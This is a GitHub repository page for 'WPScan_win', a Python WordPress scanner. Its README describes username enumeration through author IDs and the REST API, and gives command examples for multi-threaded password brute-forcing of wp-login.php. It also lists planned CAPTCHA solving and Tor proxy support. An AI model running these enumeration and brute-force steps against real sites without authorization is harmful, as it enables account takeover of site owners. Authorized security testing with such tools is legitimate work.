Skip to content

know56All1/WPScan_win

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
LICENSE.md
LICENSE.md
 
 
README.md
README.md
 
 
requeirments.txt
requeirments.txt
 
 
wpscan.py
wpscan.py
 
 

Repository files navigation

🛡️ WpScan for Windows

WpScan is a simple yet effective WordPress security scanner written in Python for Windows systems. It helps identify potential security weaknesses by checking for exposed login pages, default usernames, REST API endpoints, common WordPress misconfigurations, and performing brute-force attacks.

⚠️ For educational and authorized security testing only.

🚀 Features

  • ✅ Detects WordPress login page (/wp-login.php)
  • ✅ Checks for default/common usernames
  • ✅ Enumerates users via ?author=N pattern (with customizable range)
  • ✅ Scans the REST API endpoint /wp-json/wp/v2/users
  • ✅ Tests access to the wp-includes directory
  • ✅ Performs multi-threaded brute-force attacks on the login page
  • ✅ Supports specifying a single username or a file containing a list of usernames for brute-force
  • ✅ Customizable number of threads for the brute-force attack
  • ✅ Generates a custom wordlist based on enumerated usernames and default WordPress usernames
  • ✅ Saves results in .txt files
  • ✅ Clean and centered CLI UI using pystyle and colorama
  • ✅ Compatible with Windows and Linux terminals

📸 Images

image

⚙️ Requirements

  • Python 3.8+
  • pip (Python package manager)

🧩 Install dependencies

pip install -r requirements.txt

📁 Files Created

default_users.txt: A list of common usernames (admin, root, user, etc.). users.txt: Collected usernames found via enumeration. combined_wordlist.txt: Generated wordlist from users.txt and default_users.txt (if the -gW option is used).

🧠 How It Works

Input a WordPress target URL (automatically prepends http:// if not specified).

The scanner:

Checks for /wp-login.php Looks for wp-includes directory Tries enumerating users via /?author=1 to /?author=10 (range customizable with --start_id and --end_id) Attempts to fetch user data from /wp-json/wp/v2/users Performs a multi-threaded brute-force attack (if enabled with -b, -U, and -W) Output is printed to the terminal and saved to .txt files.

🖥️ Usage

Run the script:

python wpscan.py [options]

Options:

-u, --url: Target URL to scan (e.g., http://example.com/).

-wl, --login_panel: Find the WordPress login panel.

-eu, --enum_users: Enumerate usernames.

--start_id: Start ID for user enumeration (default: 1).

--end_id: End ID for user enumeration (default: 10).

-wi, --wp_includes: Check the wp-includes directory.

-b, --bruteforce: Enable brute-force attack.

-U, --username: Username or file containing usernames for the brute-force attack. If a file is provided, it should contain one username per line.

-W, --wordlist: Wordlist file for the brute-force attack.

-t, --threads: Number of threads for the brute-force attack (default: 5).

-gW, --gen_wordlist: Generate a wordlist from users.txt and default_users.txt.

-a, --all: Run all checks (login panel, wp-includes, enumerate users, wp-json, and brute-force if username and wordlist are provided).
Examples:

Scan a single URL:

python wpscan.py -u http://example.com/

Find the login panel and enumerate users:

python wpscan.py -u http://example.com -wl -eu

Run all checks:

python wpscan.py -a -u http://example.com

Perform a brute-force attack with a single username:

python wpscan.py -u http://example.com/wp-login.php -b -U admin -W wordlist.txt -t 10

Perform a brute-force attack with usernames from a file:

python wpscan.py -u http://example.com/wp-login.php -b -U usernames.txt -W wordlist.txt -t 10

Generate a wordlist:

python wpscan.py -gW

✍️ Author

know56_All1

GitHub: https://github.com/know56All1

Wallet: lnbc1p5ytnx9pp5jgz4la4uxzgxey8ack9egdlhpahd3vrv29t0ylnjg3eetyzj240sdqqcqzzsxqzjcsp579y2q8kh97e6maa4v9c3at87mdmdzk3mlfm5xc2uyyghmva23dxq9p4gqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqpqysgqd5597626wmyn2fqhq6t7pj7jm2ka0rrlj5dp6e9e6d7llvcd4yup3luxlyvj7l9rqmwukhtqjkrc6z5ylsuh0kxl7cv4n55xmr2q04qqv76t95

ko-fi

⚠️ Legal Disclaimer

This tool is intended for educational purposes only. Unauthorized scanning or attacking of systems you do not own or do not have explicit permission to test is illegal and strictly forbidden.

The author is not responsible for any misuse of this tool.

📌 TODO (Future Improvements)

[ ] Proxy support (e.g. Burp Suite or TOR)

[ ] Detection of vulnerable plugins and themes

[ ] Better error handling and logging

[ ] Implement rate limiting to avoid account lockouts

[ ] Add support for CAPTCHA solving

Key changes and additions:

Brute-force features: Added information about the brute-force attack, including the -U, -W, and -t options.

Wordlist generation: Included information about the -gW option and the combined_wordlist.txt file.

Customizable enumeration range: Mentioned the --start_id and --end_id options.

Updated "How It Works" section: Reflects the new brute-force functionality.

Added TODO items: Included rate limiting and CAPTCHA solving as future improvements.

Minor formatting and wording improvements.

About

💻WPScan for windows/linux💻👨‍💻By Know56👨‍💻

Topics

github python url wordpress json scanner python-script python3 python-3 wordpress-vulnerability-scanner know56

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages